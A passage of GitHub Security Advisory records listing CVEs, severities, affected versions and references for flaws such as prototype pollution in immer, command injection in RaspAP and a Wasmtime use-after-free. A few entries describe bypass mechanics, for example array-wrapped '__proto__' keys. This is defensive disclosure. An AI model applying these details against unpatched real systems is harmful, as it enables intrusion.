'github_reviewed_at': '2021-09-02T17:04:55Z', 'nvd_published_at': '2021-09-01T15:15:00Z'} |
1.4.0 | GHSA-33f9-j839-rf8h | 2023-09-11T22:29:53Z | 2021-09-02T17:17:37Z | null | ['CVE-2021-23436'] | Prototype Pollution in immer | This affects the package immer before 9.0.6. A type confusion vulnerability can lead to a bypass of CVE-2020-28477 when the user-provided keys used in the path parameter are arrays. In particular, this bypass is possible because the condition `(p === "__proto__" || p === "constructor")` in `applyPatches_` returns false if `p` is `['__proto__']` (or `['constructor']`). The `===` operator (strict equality operator) returns false if the operands have different type. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'immer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.6'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23436'}, {'type': 'WEB', 'url': 'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}, {'type': 'PACKAGE', 'url': 'https://github.com/immerjs/immer'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1579266'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IMMER-1540542'}] | {'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T16:57:31Z', 'nvd_published_at': '2021-09-01T18:15:00Z'} |
1.4.0 | GHSA-j8wc-gxx9-82hx | 2021-10-04T14:16:41Z | 2021-09-20T23:18:41Z | null | ['CVE-2021-40690'] | Exposure of Sensitive Information to an Unauthorized Actor in Apache Santuario | All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.santuario:xmlsec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.santuario:xmlsec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.7'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40690'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b3f5ba9b0de8c9c125077b71af06026d344a709a8ba67db81ee9faa@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r401ecb7274794f040cd757b259ebe3e8c463ae74f7961209ccad3c59@%3Cissues.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8848751b6a5dd78cc9e99d627e74fecfaffdfa1bb615dce827aad633%40%3Cdev.santuario.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a5c0ce9014bd07303aec1e5eed55951704878016465d3dae00e0c28@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9c100d53c84d54cf71975e3f0cfcc2856a8846554a04c99390156ce4@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raf352f95c19c0c4051af3180752cb69acbea88d0d066ab176c6170e8@%3Cuser.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbbbac0759b12472abd0c278d32b5e0867bb21934df8e14e5e641597c@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbdac116aef912b563da54f4c152222c0754e32fb2f785519ac5e059f@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re294cfc61f509512874ea514d8d64fd276253d54ac378ffa7a4880c8@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00015.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5010'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}] | {'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-20T20:24:35Z', 'nvd_published_at': '2021-09-19T18:15:00Z'} |
1.4.0 | GHSA-2rh5-jvgx-pgw3 | 2021-09-14T18:35:38Z | 2021-09-14T20:25:13Z | null | [] | Any storage file can be downloaded from p.sh if full server path is known | The default configuration for platform.sh (.platform.app.yaml) allows access to uploaded files if you know or can guess their location, regardless of whether roles grant content read access to the content containing those files. If you're using Legacy Bridge, the default configuration also allows access to certain legacy files that should not be readable, including the legacy var directory and extension directories. | [] | [{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.24.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.6.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.13.6'}}] | [{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform/security/advisories/GHSA-2rh5-jvgx-pgw3'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2021-006-storage-and-legacy-files-accessible-if-path-is-known'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezplatform'}] | {'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-14T18:35:38Z', 'nvd_published_at': None} |
1.4.0 | GHSA-f9cv-665r-275h | 2021-08-30T19:27:27Z | 2021-09-01T18:36:01Z | null | ['CVE-2021-23421'] | Prototype Pollution in merge-change | All current versions of package merge-change are vulnerable to Prototype Pollution via the utils.set function. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'merge-change'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23421'}, {'type': 'PACKAGE', 'url': 'https://github.com/VladimirShestakov/merge-change'}, {'type': 'WEB', 'url': 'https://github.com/VladimirShestakov/merge-change/blob/9901f145e06158f284f52de42e6ba5b0f702fb65/utils.js#L89-L123'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MERGECHANGE-1310985'}] | {'cwe_ids': ['CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T19:27:27Z', 'nvd_published_at': '2021-08-11T18:15:00Z'} |
1.4.0 | GHSA-fqr5-qphf-vfr8 | 2021-09-02T18:52:57Z | 2021-09-01T18:37:01Z | null | ['CVE-2020-19000'] | Cross Site Scripting (XSS) in Simiki | Cross Site Scripting (XSS) in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary code via line 54 of the component 'simiki/blob/master/simiki/generators.py'. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'simiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.2.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.2.1'}}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19000'}, {'type': 'WEB', 'url': 'https://github.com/tankywoo/simiki/issues/123'}, {'type': 'PACKAGE', 'url': 'https://github.com/tankywoo/simiki'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T18:21:24Z', 'nvd_published_at': '2021-08-27T19:15:00Z'} |
1.4.0 | GHSA-vrxp-mg9f-hwf3 | 2021-09-21T21:51:18Z | 2021-09-22T20:37:09Z | null | ['CVE-2021-41087'] | Improperly Implemented path matching for in-toto-golang | ### Impact
Authenticated attackers posing as functionaries (i.e., within a trusted set of users for a layout) are able to create attestations that may bypass DISALLOW rules in the same layout. An attacker with access to trusted private keys, may issue an attestation that contains a disallowed artifact by including path traversal semantics (e.g., foo vs dir/../foo).
### Patches
The problem has been fixed in version 0.3.0.
### Workarounds
Exploiting this vulnerability is dependent on the specific policy applied.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [in-toto-golang](http://github.com/in-toto/in-toto-golang)
* Email us at [in-toto-public](mailto:in-toto-public@googlegroups.com)
* If this is a sensitive security-relevant disclosure, please send a PGP encrypted email to santiagotorres@purdue.edu or jcappos@nyu.edu
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/in-toto/in-toto-golang'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto-golang/security/advisories/GHSA-vrxp-mg9f-hwf3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41087'}, {'type': 'WEB', 'url': 'https://github.com/in-toto/in-toto-golang/commit/f2c57d1e0f15e3ffbeac531829c696b72ecc4290'}, {'type': 'PACKAGE', 'url': 'https://github.com/in-toto/in-toto-golang'}] | {'cwe_ids': ['CWE-22', 'CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-21T21:51:18Z', 'nvd_published_at': '2021-09-21T21:15:00Z'} |
1.4.0 | GHSA-7vmw-7x57-q6jw | 2021-06-25T15:33:55Z | 2021-09-08T18:00:00Z | null | ['CVE-2021-32713'] | Cross-site scripting | Shopware is an open source eCommerce platform. Versions prior to 5.6.10 suffer from an authenticated stored XSS in administration vulnerability. Users are recommend to update to the version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.10'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-f6p7-8xfw-fjqq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32713'}, {'type': 'WEB', 'url': 'https://github.com/shopware/shopware/commit/a0850ffbc6f581a8eb8425cc2bf77a0715e21e12'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:33:55Z', 'nvd_published_at': '2021-06-24T21:15:00Z'} |
1.4.0 | GHSA-592v-7frm-h44q | 2021-07-13T15:53:43Z | 2021-09-08T17:25:36Z | null | ['CVE-2020-23700'] | Cross-site scripting in LavaLite-CMS | Cross Site Scripting (XSS) vulnerability in LavaLite-CMS 5.8.0 via the Menu Links feature. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23700'}, {'type': 'WEB', 'url': 'https://github.com/LavaLite/cms/issues/319'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-08T13:53:19Z', 'nvd_published_at': '2021-07-07T19:15:00Z'} |
1.4.0 | GHSA-x6hx-7gh3-3q98 | 2021-08-25T18:25:11Z | 2021-09-02T17:09:30Z | null | ['CVE-2021-23432'] | Prototype Pollution in mootools | This affects all versions of package mootools. This is due to the ability to pass untrusted input to Object.merge() | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'mootools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23432'}, {'type': 'PACKAGE', 'url': 'https://github.com/vsviridov/mootools-node'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MOOTOOLS-1325536'}] | {'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T18:25:11Z', 'nvd_published_at': '2021-08-24T09:15:00Z'} |
1.4.0 | GHSA-7vph-p634-vrqf | 2021-09-03T20:35:52Z | 2021-09-02T17:11:00Z | null | ['CVE-2021-38556'] | Command Injection in RaspAP 2.6.6 | includes/configure_client.php in RaspAP 2.6.6 allows attackers to execute commands via command injection. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'billz/raspap-webgui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.6'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38556'}, {'type': 'PACKAGE', 'url': 'https://github.com/RaspAP/raspap-webgui'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/blob/0e1d652c5e55f812aaf2a5908884e9db179416ee/includes/configure_client.php'}, {'type': 'WEB', 'url': 'https://zerosecuritypenetrationtesting.com/?page_id=306'}] | {'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T19:47:52Z', 'nvd_published_at': '2021-08-24T13:15:00Z'} |
1.4.0 | GHSA-9vjp-v76f-g363 | 2022-02-08T20:35:49Z | 2021-09-09T17:11:31Z | null | ['CVE-2021-37137'] | SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way | ### Impact
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well.
This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.
### Impact
All users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage.
### References
https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79
https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171
https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.68.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37137'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/6da4956b31023ae967451e1d94ff51a746a9194f'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0012/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5316'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}] | {'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T14:44:10Z', 'nvd_published_at': '2021-10-19T15:15:00Z'} |
1.4.0 | GHSA-wwvv-x5mq-h3jj | 2021-08-30T20:28:42Z | 2021-09-01T18:35:26Z | null | ['CVE-2021-3692'] | Use of Cryptographically Weak Pseudo-Random Number Generator in yiisoft/yii2-dev | yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'yiisoft/yii2-dev'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.43'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3692'}, {'type': 'WEB', 'url': 'https://github.com/yiisoft/yii2/commit/13f27e4d920a05d53236139e8b07007acd046a46'}, {'type': 'PACKAGE', 'url': 'https://github.com/yiisoft/yii2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/55517f19-5c28-4db2-8b00-f78f841e8aba'}] | {'cwe_ids': ['CWE-330', 'CWE-338'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T20:28:42Z', 'nvd_published_at': '2021-08-10T17:15:00Z'} |
1.4.0 | GHSA-h7mq-27r7-w972 | 2021-10-04T13:56:47Z | 2021-09-30T17:13:02Z | null | ['CVE-2020-20696'] | Cross-site Scripting in GilaCMS | A cross-site scripting (XSS) vulnerability in /admin/content/post of GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Tags field. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'gilacms/gila'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.11.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20696'}, {'type': 'WEB', 'url': 'https://github.com/GilaCMS/gila/issues/53'}, {'type': 'PACKAGE', 'url': 'https://github.com/GilaCMS/gila'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-29T18:25:04Z', 'nvd_published_at': '2021-09-27T22:15:00Z'} |
1.4.0 | GHSA-r659-8xfp-j327 | 2023-09-07T18:40:01Z | 2021-09-07T23:09:43Z | null | ['CVE-2021-3766'] | objection.js Prototype Pollution vulnerability | objection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'objection'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.16'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3766'}, {'type': 'WEB', 'url': 'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9'}, {'type': 'WEB', 'url': 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/vincit/objection.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c98e0f0e-ebf2-4072-be73-a1848ea031cc'}] | {'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T19:01:54Z', 'nvd_published_at': '2021-09-06T12:15:00Z'} |
1.4.0 | GHSA-hqv3-qq72-78cv | 2021-08-25T19:03:15Z | 2021-09-02T17:09:40Z | null | ['CVE-2021-23430'] | Directory Traversal in startserver | All versions of package startserver are vulnerable to Directory Traversal due to missing sanitization. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'startserver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23430'}, {'type': 'PACKAGE', 'url': 'https://github.com/xudafeng/startserver'}, {'type': 'WEB', 'url': 'https://github.com/xudafeng/startserver/blob/bef0c4e4d21da42a40ce87cf25fd54ac8d8cb2d8/lib/index.js%23L71'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-STARTSERVER-1296388'}] | {'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T19:03:15Z', 'nvd_published_at': '2021-08-24T08:15:00Z'} |
1.4.0 | GHSA-hwqc-pgjw-vjqp | 2021-10-04T13:51:41Z | 2021-09-30T17:13:11Z | null | ['CVE-2020-20693'] | Cross-Site Request Forgery in GilaCMS | A Cross-Site Request Forgery (CSRF) in GilaCMS v1.11.4 allows authenticated attackers to arbitrarily add administrator accounts. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'gilacms/gila'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.11.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20693'}, {'type': 'WEB', 'url': 'https://github.com/GilaCMS/gila/issues/51'}, {'type': 'PACKAGE', 'url': 'https://github.com/GilaCMS/gila'}] | {'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-29T18:25:09Z', 'nvd_published_at': '2021-09-27T22:15:00Z'} |
1.4.0 | GHSA-2ww3-fxvq-293j | 2023-08-30T22:32:59Z | 2021-09-29T17:14:53Z | null | ['CVE-2021-3828'] | NLTK Vulnerable to REDoS | The nltk package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide as an input to the [`_read_comparison_block()`](https://github.com/nltk/nltk/blob/23f4b1c4b4006b0cb3ec278e801029557cec4e82/nltk/corpus/reader/comparative_sents.py#L259) function in the file `nltk/corpus/reader/comparative_sents.py` may cause an application to consume an excessive amount of CPU. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'nltk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3828'}, {'type': 'WEB', 'url': 'https://github.com/nltk/nltk/pull/2816'}, {'type': 'WEB', 'url': 'https://github.com/nltk/nltk/commit/277711ab1dec729e626b27aab6fa35ea5efbd7e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/nltk/nltk'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d19aed43-75bc-4a03-91a0-4d0bb516bc32'}] | {'cwe_ids': ['CWE-1333', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T20:49:37Z', 'nvd_published_at': '2021-09-27T13:15:00Z'} |
1.4.0 | GHSA-v4cp-h94r-m7xf | 2021-09-17T20:05:21Z | 2021-09-20T19:54:05Z | null | ['CVE-2021-39216'] | Use after free passing `externref`s to Wasm in Wasmtime | ### Impact
There was a use-after-free bug when passing `externref`s from the host to guest Wasm content.
To trigger the bug, you have to explicitly pass multiple `externref`s from the host to a Wasm instance at the same time, either by
* passing multiple `externref`s as arguments from host code to a Wasm function,
* or returning multiple `externref`s to Wasm from a multi-value return function defined in the host.
If you do not have host code that matches one of these shapes, then you are not impacted.
If Wasmtime's [`VMExternRefActivationsTable`](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/crates/runtime/src/externref.rs#L493) became filled to capacity after passing the first `externref` in, then passing in the second `externref` could trigger a garbage collection. However the first `externref` is not rooted until we pass control to Wasm, and therefore could be reclaimed by the collector if nothing else was holding a reference to it or otherwise keeping it alive. Then, when control was passed to Wasm after the garbage collection, Wasm could use the first `externref`, which at this point has already been freed.
We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare.
### Patches
The bug has been fixed, and users should upgrade to Wasmtime 0.30.0.
Additionally, we have updated [our primary `externref` fuzz target](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/fuzz/fuzz_targets/table_ops.rs) such that it better exercises these code paths and we can have greater confidence in their correctness going forward.
### Workarounds
If you cannot upgrade Wasmtime yet, you can avoid the bug by disabling reference types support in Wasmtime by passing `false` to [`wasmtime::Config::wasm_reference_types`](https://docs.rs/wasmtime/0.29.0/wasmtime/struct.Config.html#method.wasm_reference_types).
### References
* [The reference types Wasm proposal, which introduces `externref`](https://github.com/WebAssembly/reference-types/)
### For more information
If you have any questions or comments about this advisory:
* Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime)
